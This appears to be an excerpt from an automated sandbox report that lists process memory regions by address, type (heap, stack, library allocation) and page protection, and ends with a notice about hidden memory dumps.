page read and write
201046AA000
heap
page read and write
27675370000
heap
page read and write
7FFD347A0000
trusted library allocation
page read and write
1D583B5E000
heap
page read and write
26615495000
heap
page read and write
26618E67000
trusted library allocation
page read and write
19981711000
trusted library allocation
page read and write
20281A17000
heap
page read and write
1D583B68000
heap
page read and write
7FFD34980000
trusted library allocation
page execute and read and write
19E82DC0000
heap
page read and write
7FFD34960000
trusted library allocation
page execute and read and write
7FFD34792000
trusted library allocation
page read and write
7FFD349E0000
trusted library allocation
page read and write
266172FA000
heap
page read and write
7FFD34A90000
trusted library allocation
page read and write
15252A57000
trusted library allocation
page read and write
7FFD34773000
trusted library allocation
page execute and read and write
202819FB000
heap
page read and write
2010470C000
heap
page read and write
7FFD34772000
trusted library allocation
page read and write
7FFD34783000
trusted library allocation
page execute and read and write
214BA8BC000
heap
page read and write
756B8FF000
stack
page read and write
1D583B4F000
heap
page read and write
7FFD347AB000
trusted library allocation
page read and write
7FFD34A30000
trusted library allocation
page read and write
201046CD000
heap
page read and write
20281970000
heap
page read and write
AB4410E000
stack
page read and write
201046DD000
heap
page read and write
19981248000
trusted library allocation
page read and write
7FFD34A00000
trusted library allocation
page read and write
214D4949000
heap
page read and write
7FFD34962000
trusted library allocation
page read and write
7FFD34940000
trusted library allocation
page execute and read and write
1D583B2D000
heap
page read and write
201046FC000
heap
page read and write
E0B51FE000
stack
page read and write
19E82E1F000
heap
page read and write
20104701000
heap
page read and write
20281A02000
heap
page read and write
9846DDB000
stack
page read and write
7FFD34950000
trusted library allocation
page execute and read and write
B788B19000
stack
page read and write
7FFD34856000
trusted library allocation
page execute and read and write
19E82E33000
heap
page read and write
1D583B63000
heap
page read and write
19E82E47000
heap
page read and write
1D583B4F000
heap
page read and write
7FFD34940000
trusted library allocation
page execute and read and write
2662F750000
heap
page read and write
15B0FA19000
heap
page read and write
1D585888000
heap
page read and write
15B0F9FE000
heap
page read and write
7FFD34AD0000
trusted library allocation
page read and write
26627741000
trusted library allocation
page read and write
1F0C3FC0000
heap
page read and write
1EE7BEED000
heap
page read and write
7FFD34782000
trusted library allocation
page read and write
7FFD34930000
trusted library allocation
page read and write
1D583B1E000
heap
page read and write
15261411000
trusted library allocation
page read and write
201046B5000
heap
page read and write
26616F00000
heap
page execute and read and write
7FFD349F0000
trusted library allocation
page read and write
7FFD34A60000
trusted library allocation
page read and write
1100C7C000
stack
page read and write
7FFD34AA0000
trusted library allocation
page read and write
214D4BD5000
heap
page read and write
276751F0000
heap
page read and write
26615550000
heap
page readonly
202819CA000
heap
page read and write
19E82E33000
heap
page read and write
26617470000
heap
page read and write
214BA830000
heap
page read and write
201046D2000
heap
page read and write
202819F8000
heap
page read and write
15B0FC50000
heap
page read and write
199EC7C8000
heap
page read and write
214BC320000
trusted library allocation
page read and write
2FD4FFD000
stack
page read and write
266152A0000
heap
page read and write
15B0F9B3000
heap
page read and write
214BE1A0000
trusted library allocation
page read and write
7FFD349E0000
trusted library allocation
page read and write
7FFD34952000
trusted library allocation
page read and write
2661549B000
heap
page read and write
1100A79000
stack
page read and write
15252F68000
trusted library allocation
page read and write
19E82DF6000
heap
page read and write
11008F8000
stack
page read and write
15B0F960000
heap
page read and write
152512F0000
heap
page execute and read and write
14E5C75000
stack
page read and write
214D499A000
heap
page read and write
14E607F000
stack
page read and write
14BC3FB000
stack
page read and write
7FFD34820000
trusted library allocation
page read and write
1524F51D000
heap
page read and write
19E82E1B000
heap
page read and write
14E637E000
stack
page read and write
15252CE7000
trusted library allocation
page read and write
214BDF28000
trusted library allocation
page read and write
26615477000
heap
page read and write
7FFD349D0000
trusted library allocation
page read and write
796D70D000
stack
page read and write
1D583B4F000
heap
page read and write
7FFD34AB0000
trusted library allocation
page read and write
26627591000
trusted library allocation
page read and write
214BC425000
heap
page read and write
1524F501000
heap
page read and write
26616F15000
heap
page read and write
202819D6000
heap
page read and write
201046DE000
heap
page read and write
1D585530000
heap
page read and write
2662760B000
trusted library allocation
page read and write
19980DF0000
trusted library allocation
page read and write
152696B6000
heap
page execute and read and write
20281870000
heap
page read and write
19E82E33000
heap
page read and write
14E5E7D000
stack
page read and write
7FFD34840000
trusted library allocation
page execute and read and write
19E82DFE000
heap
page read and write
7FFD34A30000
trusted library allocation
page read and write
1D583B55000
heap
page read and write
7FFD349C0000
trusted library allocation
page read and write
1D585880000
heap
page read and write
214BAAC0000
trusted library allocation
page read and write
1D583B3E000
heap
page read and write
1EE7BC8B000
heap
page read and write
19E82F90000
heap
page read and write
7FFD349C0000
trusted library allocation
page read and write
1EE7BCCB000
heap
page read and write
1D583B5E000
heap
page read and write
214BAAD0000
heap
page readonly
20281A17000
heap
page read and write
110038E000
stack
page read and write
756B9FF000
stack
page read and write
19E82E4D000
heap
page read and write
152615C2000
trusted library allocation
page read and write
7FFD34A50000
trusted library allocation
page read and write
796CBBB000
stack
page read and write
1D583B15000
heap
page read and write
110164E000
stack
page read and write
19E82E1A000
heap
page read and write
1F0C4290000
heap
page read and write
7FFD34830000
trusted library allocation
page execute and read and write
26616DBB000
heap
page read and write
214BA8CE000
heap
page read and write
199EA7D5000
heap
page read and write
1EE7BCD8000
heap
page read and write
7FFD349A4000
trusted library allocation
page read and write
201046F2000
heap
page read and write
20281B70000
heap
page read and write
20104630000
heap
page read and write
1D583B55000
heap
page read and write
1D583AC0000
heap
page read and write
E0B4FFE000
stack
page read and write
1D583B3E000
heap
page read and write
1526147F000
trusted library allocation
page read and write
1524F640000
trusted library allocation
page read and write
1D583AE0000
heap
page read and write
201046F2000
heap
page read and write
1EE7BE30000
heap
page read and write
214BDEF6000
trusted library allocation
page read and write
7FFD34A80000
trusted library allocation
page read and write
20104704000
heap
page read and write
19E82DFF000
heap
page read and write
7FFD3479D000
trusted library allocation
page execute and read and write
15B0FA09000
heap
page read and write
1D583B6E000
heap
page read and write
201046FC000
heap
page read and write
201046D9000
heap
page read and write
1D583B5E000
heap
page read and write
214BA8B0000
heap
page read and write
201046AC000
heap
page read and write
1100B7E000
stack
page read and write
14BC0FE000
stack
page read and write
7FFD34A31000
trusted library allocation
page read and write
152529E6000
trusted library allocation
page read and write
7FFD34A80000
trusted library allocation
page read and write
214BC323000
trusted library allocation
page read and write
15B114F0000
heap
page read and write
756B5FF000
stack
page read and write
214BC777000
heap
page read and write
2010472A000
heap
page read and write
19981C6D000
trusted library allocation
page read and write
20104705000
heap
page read and write
15251411000
trusted library allocation
page read and write
19E82E3D000
heap
page read and write
201046F2000
heap
page read and write
19E82DF6000
heap
page read and write
20281A0A000
heap
page read and write
7FFD34A50000
trusted library allocation
page read and write
7FFD34A80000
trusted library allocation
page read and write
214BA8FA000
heap
page read and write
1EE7BD04000
heap
page read and write
B7894FE000
stack
page read and write
2FD52FB000
stack
page read and write
26615600000
heap
page read and write
E0B4EFF000
stack
page read and write
214BDF24000
trusted library allocation
page read and write
20104925000
heap
page read and write
7FFD34A70000
trusted library allocation
page read and write
26617580000
heap
page execute and read and write
AB42D52000
stack
page read and write
214D4C30000
heap
page read and write
1EE7BCAE000
heap
page read and write
20104700000
heap
page read and write
984707E000
unkown
page read and write
27675397000
heap
page read and write
7FFD34A40000
trusted library allocation
page read and write
7FFD34AD0000
trusted library allocation
page read and write
14BB8FA000
stack
page read and write
7FFD34970000
trusted library allocation
page read and write
214CC931000
trusted library allocation
page read and write
199816FC000
trusted library allocation
page read and write
796D60E000
stack
page read and write
7FFD34990000
trusted library allocation
page read and write
7FFD34A00000
trusted library allocation
page read and write
2FD49FE000
stack
page read and write
15B0FA19000
heap
page read and write
20281BC5000
heap
page read and write
26615440000
trusted library allocation
page read and write
199EA7A7000
heap
page read and write
1D583900000
heap
page read and write
214BE174000
trusted library allocation
page read and write
214BDF36000
trusted library allocation
page read and write
1D583B4F000
heap
page read and write
1524F6A0000
heap
page read and write
20281A01000
heap
page read and write
19E848B0000
heap
page read and write
15251484000
trusted library allocation
page read and write
7FFD349A0000
trusted library allocation
page read and write
1D583B8C000
heap
page read and write
20104704000
heap
page read and write
7FFD34921000
trusted library allocation
page read and write
214BE1FA000
trusted library allocation
page read and write
202837A0000
heap
page read and write
796CA3E000
stack
page read and write
201046AC000
heap
page read and write
14E6F4F000
stack
page read and write
2FD48FD000
stack
page read and write
14E657B000
stack
page read and write
19981922000
trusted library allocation
page read and write
110067E000
stack
page read and write
27145D50000
heap
page read and write
7FFD34A40000
trusted library allocation
page read and write
14E62FE000
stack
page read and write
1D583B55000
heap
page read and write
15B0F9F9000
heap
page read and write
14E63FE000
stack
page read and write
19E84C40000
heap
page read and write
199EC890000
heap
page execute and read and write
796CABE000
stack
page read and write
199EC170000
heap
page read and write
266153A0000
heap
page read and write
1524F4A0000
heap
page read and write
7FFD34840000
trusted library allocation
page read and write
214BAB40000
heap
page read and write
1524F4FF000
heap
page read and write
214CCACA000
trusted library allocation
page read and write
201046FC000
heap
page read and write
7FFD349D0000
trusted library allocation
page read and write
214BC910000
heap
page execute and read and write
266177BD000
trusted library allocation
page read and write
214D4920000
heap
page read and write
E0B4AFE000
stack
page read and write
15B0FA0A000
heap
page read and write
19981650000
trusted library allocation
page read and write
199EC140000
trusted library allocation
page read and write
19E84C48000
heap
page read and write
201046F2000
heap
page read and write
27145D80000
heap
page read and write
7FFD34941000
trusted library allocation
page read and write
214CC921000
trusted library allocation
page read and write
266155D0000
trusted library allocation
page read and write
AB431FF000
stack
page read and write
19E82E19000
heap
page read and write
1EE7BCC2000
heap
page read and write
1D583B5E000
heap
page read and write
19E82E3D000
heap
page read and write
110087E000
stack
page read and write
7FFD34836000
trusted library allocation
page read and write
1999006E000
trusted library allocation
page read and write
214D4AC6000
heap
page execute and read and write
11016CE000
stack
page read and write
110180F000
stack
page read and write
14BC1FD000
stack
page read and write
214D4C2D000
heap
page read and write
266154D7000
heap
page read and write
796C7FE000
stack
page read and write
1D583B16000
heap
page read and write
7FFD3478B000
trusted library allocation
page read and write
214D4BEC000
heap
page read and write
214BC921000
trusted library allocation
page read and write
19E82DEB000
heap
page read and write
7FFD34A90000
trusted library allocation
page read and write
214BDF2F000
trusted library allocation
page read and write
7FFD34774000
trusted library allocation
page read and write
AB4327E000
stack
page read and write
AB442CF000
stack
page read and write
7FFD34A10000
trusted library allocation
page read and write
AB436BB000
stack
page read and write
796D68E000
stack
page read and write
14E60FD000
stack
page read and write
7FFD34A40000
trusted library allocation
page read and write
201046AA000
heap
page read and write
7FFD3494A000
trusted library allocation
page read and write
11003CE000
stack
page read and write
214CC987000
trusted library allocation
page read and write
199EC970000
heap
page execute and read and write
1525135D000
heap
page read and write
1F0C40D4000
heap
page read and write
199ECADC000
heap
page read and write
199ECAEB000
heap
page read and write
152699C0000
heap
page read and write
266154DB000
heap
page read and write
202819D6000
heap
page read and write
201046CC000
heap
page read and write
14E5F7B000
stack
page read and write
214BE47B000
trusted library allocation
page read and write
2C685DD0000
heap
page read and write
1525302E000
trusted library allocation
page read and write
7FFD34A10000
trusted library allocation
page read and write
2662F774000
heap
page read and write
1D583B4F000
heap
page read and write
1D583B6D000
heap
page read and write
1526148B000
trusted library allocation
page read and write
15B0F9CB000
heap
page read and write
201046FC000
heap
page read and write
2C685D80000
heap
page read and write
1D583B2F000
heap
page read and write
7FFD34950000
trusted library allocation
page execute and read and write
19E82E0E000
heap
page read and write
15B0FA19000
heap
page read and write
2FD51FF000
stack
page read and write
199EC5D0000
trusted library allocation
page read and write
214BD54B000
trusted library allocation
page read and write
19E82E50000
heap
page read and write
7FFD349D0000
trusted library allocation
page read and write
14BBCFE000
stack
page read and write
15B0F9CC000
heap
page read and write
14E5FFF000
stack
page read and write
7FFD34A90000
trusted library allocation
page read and write
201046F2000
heap
page read and write
1EE7BC20000
heap
page read and write
1524F549000
heap
page read and write
1524F4C8000
heap
page read and write
There are 933 hidden memdumps, click here to show them.